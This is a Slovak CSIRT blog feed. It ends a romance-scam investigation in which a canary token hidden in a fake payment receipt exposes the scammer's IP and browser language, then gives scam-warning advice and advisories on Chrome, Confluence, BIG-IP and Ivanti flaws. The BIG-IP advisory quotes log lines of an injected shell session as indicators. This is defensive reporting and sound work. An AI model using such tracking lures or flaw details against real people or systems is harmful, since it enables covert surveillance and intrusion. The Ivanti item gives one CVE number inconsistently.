<p>Dňa 2.2.2022 získavame bankové údaje „Natalye“, ktoré nahlasujeme kyberbezpečnostnej jednotke CSIRT zodpovednej za ruský bankový sektor.&nbsp;Rovnako nahlasujeme zneužitie fotografií pravdepodobne ruskej občianky. Odpoveď bohužiaľ nedostávame. Banka, ktorú podvodník používa, funguje online. Môže to byť účet bieleho koňa (tzv. money mule) alebo môže patriť priamo podvodníkovi, ak inštitúcia povoľuje vytvoriť účet na falošné meno či anonymne. Nasleduje séria zväčša kratších, no nadšených e-mailov. Podvodník čaká na platbu, pretože sme mu napísali, že sme peniaze poslali. Viackrát sa pýta, či sme uskutočnili prevod. 7.2.2022 posielame falošné potvrdenie o&nbsp;platbe z vymysleného čísla účtu. Keď ani po týždni peniaze neprichádzajú, vymýšľame sme si, že naša banka platbu vrátila ako podozrivú.</p>



<p>Na&nbsp;tomto mieste je dôležité podotknúť, že doba, za ktorú podvodník začne od svojej obete pýtať peniaze, sa môže líšiť. Dôvody bývajú tiež rôznorodé. Niekedy to môže trvať celé mesiace, kým sa podvodník uistí, že vytvoril dostatočne hlbokú dôveru. A&nbsp;teraz si skúsme uvedomiť, vžiť sa do situácie, ako by sme sa zachovali, keby sme mali finančné problémy my. Pýtali by sme si peniaze od človeka, s&nbsp;ktorým si píšeme pomerne krátky čas a&nbsp;ešte sme sa nikdy osobne nestretli? Pri tomto cvičení nám pravdepodobne príde celá situácia absurdná.</p>



<p><strong>Ako sme využili potvrdenie o&nbsp;platbe</strong></p>



<p>Počas našej konverzácie s&nbsp;podvodníkom chceme získať cenné informácie, ktoré by nám pomohli ho lokalizovať a&nbsp;v&nbsp;ideálnom prípade identifikovať. Využijeme na to tzv. Canary token, kúsok kódu, ktorý pri aktivácii odošle na vybranú destináciu informácie o&nbsp;zariadení, v&nbsp;ktorom sa nachádza. Vymýšľame, ako podvodníka presvedčiť, aby ho aktivoval.</p>



<p>V&nbsp;prvom pokuse ho umiestňujeme do dokumentu Microsoft Word. Zámienkou je písomné potvrdenie, že „Natalya“ použije požadovaných 447 Eur skutočne na cestovné nálady. Stačí nám, aby do prázdnej kolonky napísala svoje meno. Podvodník súhlasí. Posiela nám doplnený dokument. So sklamaním zisťujeme, že token sa neaktivoval napriek tomu, že nám pri testovaní fungoval.</p>



<p>Skúšame teda iný prístup. Vkladáme URL token priamo do tela e-mailu. Opäť bez úspechu aj keď na e-mail dostávame odpoveď (teda podvodník ho otvoril).</p>



<p>Nevzdávame sa a&nbsp;do tretice máme úspech. Do tela e-mailu vkladáme naše falošné potvrdenie o&nbsp;finančnom prevode, do ktorého sme injektovali canary token. Pre istotu vkladáme jeden URL token aj do tela e-mailu.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="574" height="1024" src="/wp-content/uploads/2024/02/scam10-574x1024.jpg" alt="" class="wp-image-566"/><figcaption class="wp-element-caption">Náš e-mail s&nbsp;vloženým falošným potvrdením o&nbsp;platbe požadovaných 447 Eur na cestovné náklady, aby nás „Natalya“ mohla prísť navštíviť.</figcaption></figure></div>


<p>Zaujme nás hneď IP adresa, z&nbsp;ktorej podvodník operuje. Jedná sa o&nbsp;adresu, ktorú v tom čase využíval švajčiarsky poskytovateľ cloudových služieb. Podvodník je zdá sa zbehlý v&nbsp;spôsoboch anonymizácie svojej aktivity. Predpokladáme, že v&nbsp;skutočnosti sa nachádza v&nbsp;Nigérii alebo Indii, vo dvoch najbežnejších lokalitách internetových podvodníkov. „Natalya“ aktivovala token z dvoch internetových prehliadačov. Google Chrome nám veľa zaujímavých informácií neposkytuje. V Mozilla Firefox však upúta našu pozornosť jazyk internetového prehliadača. Podvodník používa estónčinu.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="585" height="1024" src="/wp-content/uploads/2024/02/scam11-585x1024.jpg" alt="" class="wp-image-565"/><figcaption class="wp-element-caption">Zozbierané dáta pomocou canary tokenu. Token aktivoval podvodník z dvoch prehliadačov. V dátach pre prehliadač Mozilla Firefox vidíme, že podvodník používa estónsku jazykovú lokalizáciu.</figcaption></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="578" height="1024" src="/wp-content/uploads/2024/02/scam12-578x1024.jpg" alt="" class="wp-image-564"/><figcaption class="wp-element-caption">V rámci informácii o geolokácii si môžeme všimnúť švajčiarskeho poskytovateľa cloudových služieb</figcaption></figure></div>


<p><strong>Poďme si rozobrať podozrivé elementy komunikácie</strong></p>



<p>Pozrime sa na aspekty komunikácie s „Natalyou“, ktoré vzbudzujú podozrenie, že niečo nie je v&nbsp;súlade s&nbsp;kostolným poriadkom.</p>



<p>„Natalya“ si nás vyhliadla na platforme Pokec. Prvé podozrenie naberáme už kvôli samotnému naratívu, že atraktívne dievča z&nbsp;Ruska si hľadá vážny vzťah na slovenskej sociálnej sieti. Hneď po prehodení prvej správy nám navrhuje komunikáciu cez e-mail. V&nbsp;hlave nám zasvieti prvé červené svetielko. Keď sa nápadník snaží čím skôr presunúť konverzáciu na iný kanál, znamená to najčastejšie jediné a&nbsp;to, že jeho podvodný profil na zoznamke alebo sociálnej sieti je ľahkým cieľom prevádzkovateľa služby, ktorý ho môže kedykoľvek bez upozornenia zrušiť. Podvodník by tak stratil kontakt so svojou obeťou. Častou voľbou podvodníkov je e-mail, WhatsApp alebo obdobná komunikačná platforma.</p>



<p>V&nbsp;krátkom čase, po výmene niekoľkých úvodných nemastných-neslaných správ, sa o&nbsp;nás začína neprirodzene zaujímať. Komplimenty sú nám samozrejme príjemné, no vieme, že sa nimi nesmieme nechať zaslepiť. Potrebujeme k&nbsp;nim pristupovať s&nbsp;kritickou mysľou. Kompliment si treba zaslúžiť. Pokiaľ ho dostaneme zadarmo, protistrana ním takmer isto sleduje zištný cieľ.</p>



<p>Správy, ktoré od „Natalye“ dostávame, sú v&nbsp;<strong>s</strong>lovenčine, očividne strojovo preložené. Na tom by nebolo nič zvláštne. Analýzou textu správ však dospievame k&nbsp;záveru, že pôvodný text píše „Natalya“ v&nbsp;angličtine namiesto svojej rodnej reči. Vzhľadom na to, že používa prekladač, nedáva nám to celkom zmysel. Ukážeme niekoľko význačných fráz, podľa ktorých vidíme, že stavba jazyka pripomína angličtinu. Prvá veta predstavuje pôvodný text z&nbsp;e-mailov, veta v&nbsp;zátvorke je náš odhad originálneho textu pred prekladom:</p>



<ul>
<li>O čom to rozprávaš? (What are you talking about?)</li>



<li>Richard, ako sa máš v kuchyni? (Richard, how are you in kitchen?)</li>



<li>Čaká na vašu odpoveď! (Waiting for your answer!)</li>



<li>Dúfam, že jedného dňa sa stretneme v skutočnom svete. (I hope one day we will meet in a real world.)</li>



<li>Vždy stojím na svojom. (I always stand on my own.)</li>



<li>Veci sú dobré? (Things are good?)</li>



<li>Obchod? (Deal?)</li>



<li>Teraz diabol vie, čo sa deje vo svete a&nbsp;na internete. (Now devil knows what is happening in the world and on the Internet.)</li>



<li>&#8230;ale zima je špeciálny čas. (&#8230;but winter is a&nbsp;special time.)</li>



<li>Naozaj milujem kvety, najmä tulipány. (I really love flowers, especially tulips.)</li>



<li>Dúfam, že sa vám bude páčiť čítanie mojej správy. (I hope you will like reading my message.)</li>



<li>Vidíme sa neskôr! (See you later!)</li>



<li>&#8230;pretože som už našiel špeciálneho človeka. (&#8230;because I&nbsp;already found special person.)</li>



<li>Nechcem od teba znova počuť. (I don’t want to hear from you again.)</li>
</ul>



<p>Dôležitým varovným signálom sú skoré fyzické narážky a prejavy príťažlivosti. „Natalyi“ sme neposlali žiadne svoje fotky. Jediná, ktorú si mohla všimnúť, bola na Pokeci. Pokec však rýchlo opustila, jej účet bol zrušený. Pokúsme sa vcítiť do role peknej mladej ženy, ktorá má množstvo obdivovateľov a&nbsp;je zvyknutá na záujem atraktívnych mužov. Prejavovali by sme na jej mieste fyzické sympatie niekomu, koho fotky sme ani nevideli, nikdy sme ho nestretli naživo a vieme o&nbsp;ňom len niekoľko základných informácií?</p>



<p>Najväčším varovným signálom je, keď si „Natalya“ začína pýtať peniaze. Má skvelú zámienku – potrebuje ich na cestovné náklady, aby nás mohla prísť navštíviť. Zo zvedavosti, čo sa bude diať navrhujeme, nech nám pošle časť sumy, ktorú má našetrenú. Letenku jej kúpime a&nbsp;pošleme na e-mail s&nbsp;tým, že zvyšok ceny doplatíme. Na návrh dostávame odpoveď v&nbsp;podobe ochladnutia konverzácie.</p>



<p>Vhodným nástrojom na odhalenie podvodu je porovnanie našej komunikácie s našimi skúsenosťami z&nbsp;minulosti a vžitie sa do role náprotivnej strany, s&nbsp;ktorou komunikujeme. Jednali by sme rovnako, ak by sme mali čistý úmysel? Predtým, ako začnete svojmu neznámemu dôverovať, urobte si niekoľko testov. Spojte sa s&nbsp;ním cez videohovor a&nbsp;všímajte si, či pohyb pier zodpovedá slovám, ktoré počujete. Navrhnite stretnutie niekde na verejnosti. Nezdieľajte šteklivé fotografie, citlivé informácie a&nbsp;neposielajte peniaze človeku, s&nbsp;ktorým ste sa nestretli naživo.</p>



<p><strong>Odporúčania</strong></p>



<ul>
<li>Keď Vás niekto osloví na Internete, pričom je hneď od začiatku alebo veľmi skoro nezvyčajne milý, rozdáva komplimenty, prejavuje silné city a&nbsp;rozpráva o&nbsp;spoločnej budúcnosti bez toho, aby Vás trochu lepšie poznal, zbystrite pozornosť.</li>



<li>Preverujte fotografie neznámeho nápadníka cez reverzné vyhľadávanie obrázkov (napríklad vyhľadávanie obrázkov Google, TinEye.com). Nie je to stopercentná záruka, no dáva Vám nezanedbateľnú šancu, že podvodníka odhalíte.</li>



<li>Neposielajte svoje fotografie, pokiaľ si nie ste istí, že skutočne komunikujete s&nbsp;človekom, za ktorého sa protistrana vydáva. Erotické fotografie neposielajte nikdy, aby ste sa nestali obeťou vydierania alebo neskončili na stránkach, kde si pomstychtiví jedinci vylievajú zlosť uverejňovaním kompromitujúcich fotografií svojich bývalých partnerov.</li>



<li>Neposkytujte citlivé informácie a&nbsp;svoje osobné údaje online.</li>



<li>Ak sa dohadujete na osobnom stretnutí, no protistrana viackrát stretnutie zruší pod rôznymi zámienkami, zbystrite pozornosť.</li>



<li>Ak ste človeku, s&nbsp;ktorým ste sa v&nbsp;živote nestretli, poslali peniaze, o&nbsp;ktoré vás prosil za ľubovoľným účelom, nahláste to bezodkladne polícii.</li>



<li>Nikdy nesúhlaste s&nbsp;prijímaním a&nbsp;preposielaním financií. Stanete sa tzv. money mule, resp. bielym koňom v&nbsp;procese prania špinavých peňazí.</li>



<li>Nikdy neposkytujte overovacie kódy, ktoré vám prídu na telefón a&nbsp;ktoré si protistrana od Vás pýta. V&nbsp;lepšom prípade si podvodník na Vašu identitu vytvorí nový účet na zoznamke, v&nbsp;horšom môžete potvrdiť prevod peňazí z&nbsp;Vášho účtu.</li>
</ul>



<p><strong>Zaujímavé zdroje</strong></p>



<p><a href="https://www.scamwatch.gov.au/types-of-scams/dating-romance" target="_blank" rel="noreferrer noopener">https://www.scamwatch.gov.au/types-of-scams/dating-romance</a></p>



<p><a href="https://www.cyber.gov.au/acsc/view-all-content/guidance/step-1-screen-every-profile-image-using-reverse-online-image-search" target="_blank" rel="noreferrer noopener">https://www.cyber.gov.au/acsc/view-all-content/guidance/step-1-screen-every-profile-image-using-reverse-online-image-search</a></p>



<p><a href="https://www.fbi.gov/scams-and-safety/common-scams-and-crimes/romance-scams" target="_blank" rel="noreferrer noopener">https://www.fbi.gov/scams-and-safety/common-scams-and-crimes/romance-scams</a></p>



<p><a href="https://www.girlsaskguys.com/other/q1138107-what-websites-do-guys-post-pictures-of-their-ex-girlfriends" target="_blank" rel="noreferrer noopener">https://www.girlsaskguys.com/other/q1138107-what-websites-do-guys-post-pictures-of-their-ex-girlfriends</a></p>



<p><a href="https://www.pinterest.com/malescammers/pictures-used-by-male-scammers-in-dating-fraud/" target="_blank" rel="noreferrer noopener">https://www.pinterest.com/malescammers/pictures-used-by-male-scammers-in-dating-fraud/</a></p>



<p><a href="https://www.pinterest.com/stopscammerscom/pictures-used-by-female-scammers-in-dating-scams/" target="_blank" rel="noreferrer noopener">https://www.pinterest.com/stopscammerscom/pictures-used-by-female-scammers-in-dating-scams/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/561/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zero-day zraniteľnosť v Google Chrome</title>
		<link>/posts/183</link>
					<comments>/posts/183#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 23 Jan 2024 10:54:01 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=183</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Google vydal neočakávanú bezpečnostnú aktualizáciu pre aktívne zneužívanú zero-day zraniteľnosť. Zraniteľnosť CVE-2024-0519 je aktívne zneužívaná a&#160;môže viesť k vzdialenému vykonávaniu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Google vydal neočakávanú bezpečnostnú aktualizáciu pre aktívne zneužívanú zero-day zraniteľnosť. Zraniteľnosť CVE-2024-0519 je aktívne zneužívaná a&nbsp;môže viesť k vzdialenému vykonávaniu kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Google Chrome verzie staršie ako 120.0.6099.224</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-0519 (CVSS skóre 8,8)</strong></p>



<p><strong>Zero-day zraniteľnosť</strong> CVE-2024-0519 sa nachádza <strong>v komponente V8 v Google Chrome</strong> a umožňuje <strong>pristupovať mimo povolené hodnoty pamäte. </strong>Vzdialeným útočníkom umožňuje napríklad pomocou <strong>škodlivej HTML stránky zneužiť poškodenie pamäte na halde</strong>. Vo všeobecnosti úspešné zneužitie chyby dovoľujúcej prístup mimo povolené hodnoty v pamäti umožňuje podľa identifikátora CWE <strong>získať adresy pamäte</strong>, ktoré môžu byť použité pre <strong>obídenie ochranných mechanizmov (ASLR)</strong> na dosiahnutie <strong>vzdialeného vykonávania kódu alebo nedostupnosti služby</strong>. ASLR je proces ochrany pamäte pred útokmi typu <strong>buffer-overflow</strong> (pretečenia medzipamäte), ktorý randomizuje umiestnenie určitých dát v pamäti. </p>



<p><strong>Zraniteľnosť je aktívne zneužívaná.</strong></p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia Chrome aspoň na verziu 120.0.6099.224/225 pre Windows, 120.0.6099.234 pre macOS a 120.0.6099.224 pre Linux alebo novšiu.</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html">https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html</a></li>



<li><a href="https://thehackernews.com/2024/01/zero-day-alert-update-chrome-now-to-fix.html">https://thehackernews.com/2024/01/zero-day-alert-update-chrome-now-to-fix.html</a></li>



<li><a href="https://www.securityweek.com/google-warns-of-chrome-browser-zero-day-being-exploited/">https://www.securityweek.com/google-warns-of-chrome-browser-zero-day-being-exploited/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-0519">https://nvd.nist.gov/vuln/detail/CVE-2024-0519</a></li>



<li><a href="https://www.techtarget.com/searchsecurity/definition/address-space-layout-randomization-ASLR">https://www.techtarget.com/searchsecurity/definition/address-space-layout-randomization-ASLR</a></li>
</ul>



<p><a id="_msocom_1"></a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/183/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v Confluence Data Center a Server</title>
		<link>/posts/180</link>
					<comments>/posts/180#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 23 Jan 2024 10:39:09 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=180</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/atlassian-logo-4139587245-1024x724.jpg" alt="" /></p>Spoločnosť Atlassian vydala bezpečnostnú opravu pre kritickú zraniteľnosť CVE-2023-22527, ktorá umožňuje vzdialené vykonávanie kódu na koncových zariadeniach. Zraniteľné systémy: Opis...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/atlassian-logo-4139587245-1024x724.jpg" alt="" /></p>
<p><strong>Spoločnosť Atlassian vydala bezpečnostnú opravu pre kritickú zraniteľnosť CVE-2023-22527, ktorá umožňuje vzdialené vykonávanie kódu na koncových zariadeniach.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Confluence Data Center a Confluence Server: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-22527 (CVSS skóre 10)</strong></p>



<p><strong>Kritická zraniteľnosť</strong> CVE-2023-22527 sa nachádza v&nbsp;Confluence Data Center a&nbsp;Server. <strong>Chyba sa týka injektovania šablóny a </strong>umožňuje <strong>neautentifikovanému útočníkovi vzdialené vykonávanie kódu na koncových zariadeniach</strong>. <strong></strong></p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia aspoň na verzie Confluence Data Center a Server 8.5.4, Confluence Data Center 8.6.0 a 8.7.1.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.bleepingcomputer.com/news/security/atlassian-warns-of-critical-rce-flaw-in-older-confluence-versions/">https://www.bleepingcomputer.com/news/security/atlassian-warns-of-critical-rce-flaw-in-older-confluence-versions/</a></p>



<p><a href="https://thehackernews.com/2024/01/citrix-vmware-and-atlassian-hit-with.html">https://thehackernews.com/2024/01/citrix-vmware-and-atlassian-hit-with.html</a></p>



<p><a href="https://www.securityweek.com/atlassian-warns-of-critical-rce-vulnerability-in-outdated-confluence-instances/">https://www.securityweek.com/atlassian-warns-of-critical-rce-vulnerability-in-outdated-confluence-instances/</a></p>



<p><a href="https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html">https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-22527">https://nvd.nist.gov/vuln/detail/CVE-2023-22527</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/180/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v BIG-IP</title>
		<link>/posts/177</link>
					<comments>/posts/177#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 23 Jan 2024 07:56:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=177</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/F5_Networks_logo.svg_-1024x940.png" alt="" /></p>Spoločnosť F5 poukázala na aktívne zneužívanú zraniteľnosť CVE-2023-46747, ktorá umožňuje neautentifikovanému útočníkovi vzdialené vykonávanie kódu. Existuje viac ako 6 000...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/F5_Networks_logo.svg_-1024x940.png" alt="" /></p>
<p><strong>Spoločnosť F5 poukázala na aktívne zneužívanú zraniteľnosť CVE-2023-46747, ktorá umožňuje neautentifikovanému útočníkovi vzdialené vykonávanie kódu. Existuje viac ako 6 000 internetových inštancií, ktoré používajú aplikačnú sieťovú bezpečnosť BIG-IP, ktoré sú potenciálne ohrozené.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p><strong>BIG-IP:</strong></p>



<ul>
<li>17.1.0 (Opravené v 17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG)</li>



<li>16.1.0 &#8211; 16.1.4 (Opravené v 16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG)</li>



<li>15.1.0 &#8211; 15.1.10 (Opravené v 15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG)</li>



<li>14.1.0 &#8211; 14.1.5 (Opravené v 14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG)</li>



<li>13.1.0 &#8211; 13.1.5 (Opravené v 13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-46747 (CVSS skóre 9,8)</strong></p>



<p><strong>Kritická zraniteľnosť</strong> CVE-2023-46747 v konfiguračnom nástroji BIG-IP umožňuje <strong>neautentifikovanému útočníkovi so sieťovým prístupom k manažmentovému portu</strong> zraniteľného zariadenia vykonávať <strong>ľubovoľné systémové príkazy</strong>. Zraniteľnosť spočíva v <strong>prepašovaní škodlivej požiadavky</strong>, pomocou ktorej môže útočník získať <strong>administrátorské práva</strong>.</p>



<p>Zraniteľnosť je možné <strong>zreťaziť so</strong> <strong>zraniteľnosťou CVE-2023-46748</strong>, ktorá umožňuje autentifikovanému útočníkovi vykonávať <strong>SQL injekcie v konfiguračnom nástroji</strong>. To umožňuje útočníkom vykonávať systémové príkazy, čo môže viesť ku vzdialenému vykonávaniu kódu.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Ľubovoľné vykonávanie systémových príkazov</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>VJ CSIRT odporúča obmedziť prístup k administratívnemu rozhraniu Traffic Management User Interface. Pre Big-IP verzie 14.1.0 a&nbsp;novšie spustite skript podľa </strong><a href="https://my.f5.com/manage/s/article/K000137353">návodu/postupu</a><strong>.</strong></p>



<p><strong>Používateľom sa odporúča skontrolovať súbor /var/log/tomcat/catalina.out, či sa v ňom nenachádzajú podozrivé záznamy, ako napríklad:</strong></p>



<p><em>{&#8230;}</em></p>



<p><em>java.sql.SQLException: Column not found: 0.</em></p>



<p><em>{&#8230;)</em></p>



<p><em>sh: no job control in this shell</em></p>



<p><em>sh-4.2$ &lt;EXECUTED SHELL COMMAND&gt;</em></p>



<p><em>sh-4.2$ exit.</em></p>



<p><strong>Aktualizácia BIG-IP na opravené verzie:</strong></p>



<ul>
<li>17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG</li>



<li>16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG</li>



<li>15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG</li>



<li>14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG</li>



<li>13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG<strong></strong></li>
</ul>



<p><strong>Odkazy:</strong></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747">https://nvd.nist.gov/vuln/detail/CVE-2023-46747</a></p>



<p><a href="https://thehackernews.com/2023/11/alert-f5-warns-of-active-attacks.html">https://thehackernews.com/2023/11/alert-f5-warns-of-active-attacks.html</a></p>



<p><a href="https://my.f5.com/manage/s/article/K000137353">https://my.f5.com/manage/s/article/K000137353</a></p>



<p><a href="https://www.securityweek.com/attackers-exploiting-critical-f5-big-ip-vulnerability/">https://www.securityweek.com/attackers-exploiting-critical-f5-big-ip-vulnerability/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/177/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Dve zero-day zraniteľnosti v produktoch Ivanti</title>
		<link>/posts/117</link>
					<comments>/posts/117#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 20 Jan 2024 09:50:50 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=117</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>Spoločnosť Ivanti poukázala na dve aktívne zneužívané zero-day zraniteľnosti v&#160;produktoch Ivanti. Zraniteľnosti sú aktívne zneužívané a&#160;boli zneužité hackerskou skupinou napojenou...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>
<p><strong>Spoločnosť Ivanti poukázala na dve aktívne zneužívané zero-day zraniteľnosti v&nbsp;produktoch Ivanti. Zraniteľnosti sú aktívne zneužívané a&nbsp;boli zneužité hackerskou skupinou napojenou na čínsku vládu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>Ivanti Connect Secure a&nbsp;Policy Secure 9.x, 22.x</p>



<p><strong>Opis činnosti:</strong></p>



<p>Dve <strong>zero-day zraniteľnosti, </strong>CVE-2023-46805 a CVE-2024-24887, sa nachádzajú vo webovej súčasti produktov <strong>Ivanti Connect Secure a Policy Secure</strong>. <strong>Tieto zraniteľnosti boli aktívne zneužívané</strong> hackerskou skupinou <strong>napojenou na čínsku vládu</strong>.</p>



<p><strong>CVE-2023-46805 (CVSS skóre 8,2)</strong></p>



<p>Zraniteľnosť CVE-2023-46805 umožňuje útočníkovi <strong>obísť autentifikáciu</strong>, čo umožňuje získať prístup k&nbsp;<strong>chráneným zdrojom.</strong></p>



<p><strong>CVE-2024-21887 (CVSS skóre 9,1)</strong></p>



<p>Kritická zraniteľnosť CVE-2024-24887 umožňuje autentifikovanému útočníkovi s&nbsp;administrátorskými oprávneniami <strong>vykonávať ľubovoľné príkazy</strong> na napadnutom zariadení.</p>



<p>Úspešné zneužitie zraniteľností pozorované pri reálnych útokoch umožnilo útočníkom ukradnúť <strong>konfiguračné údaje, upraviť súbory a&nbsp;vytvoriť vzdialený tunel zo zariadenia VPN</strong>. Útočník tiež vykonal zmeny, aby sa <strong>vyhol kontrole integrity systému</strong> a <strong>pridal zadné vrátka do legitímneho súboru CGI v zariadení.</strong> Útočníci môžu získať prístup k citlivým údajom, šíriť škodlivý softvér alebo dokonca prevziať kontrolu nad napadnutým zariadením.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Zraniteľnosti je možné mitigovať importovaním súboru mitigation.release.20240107.1.xml prostredníctvom portálu na stiahnutie. Konkrétny postup nájdete </strong><a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US"><strong>tu.</strong></a><strong></strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2024/01/chinese-hackers-exploit-zero-day-flaws.html">https://thehackernews.com/2024/01/chinese-hackers-exploit-zero-day-flaws.html</a></p>



<p><a href="https://www.sk-cert.sk/sk/varovanie-pred-kritickymi-zranitelnostami-v-produktoch-od-spolocnosti-ivanti/index.html">https://www.sk-cert.sk/sk/varovanie-pred-kritickymi-zranitelnostami-v-produktoch-od-spolocnosti-ivanti/index.html</a></p>



<p><a href="https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day">https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day</a></p>



<p><a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US">https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US</a></p>



<p><a href="https://www.itnews.com.au/news/ivanti-patches-two-exploited-zero-day-bugs-603958">https://www.itnews.com.au/news/ivanti-patches-two-exploited-zero-day-bugs-603958</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/117/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v serveri SharePoint</title>
		<link>/posts/115</link>
					<comments>/posts/115#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 20 Jan 2024 09:49:47 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=115</guid>

